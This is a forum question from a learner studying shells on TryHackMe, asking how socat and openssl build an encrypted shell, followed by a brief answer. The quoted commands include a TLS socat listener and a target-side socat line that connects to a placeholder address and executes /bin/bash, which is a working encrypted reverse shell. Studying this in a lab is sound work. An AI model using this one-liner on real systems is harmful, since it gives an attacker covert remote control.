# How exactly does using socat in conjuction with openssl for encrypted shells work?

Tags: openssl, socat, reverse-shell

While studying reverse/bind shells on TryHackMe, I encountered a few lines of code that I am struggling to fully understand their functions. Here is the code in question:

`openssl req --newkey rsa:2048 -nodes -keyout shell.key -x509 -days 362 -out shell.crt`

-generates an RSA private key. What specifies it as being private and not public?

-generates a certificate, however I thought certificates were mainly used for websites?

`socat OPENSSL-LISTEN:<PORT>,cert=shell.pem,verify=0 -`

-socat is opening a listener with OpenSSL instead of TCP, which I assume starts an endpoint of an encrypted channel.

-This listener is using a .pem file that is created with a line of code not included here, which includes the private key and TLS certificate.

-The listener is being set to run with that certificate, while 'verify=0' ensures it is run without checking its authenticity from a CA.

`socat OPENSSL:<LOCAL-IP>:<LOCAL-PORT>,verify=0 EXEC:/bin/bash`

-The target connects to the listener by specifying its IP and port number, while also not checking for the authenticity of a certificate.

What exactly is going on here? Why does the machine connecting to the OpenSSL listener not need to provide a key for an encrypted channel? What is the difference between socat TCP-L and socat OPENSSL-L?

If anyone could help by breaking down some of what's happening it'd be greatly appreciated.

Answer (score 0):

This is way of TLS. Like browser connects to secure HTTPS.
You can always change verify option to force signature verification methods.

There is small project which I did about it.

https://aze2201.github.io/shell_sockV2/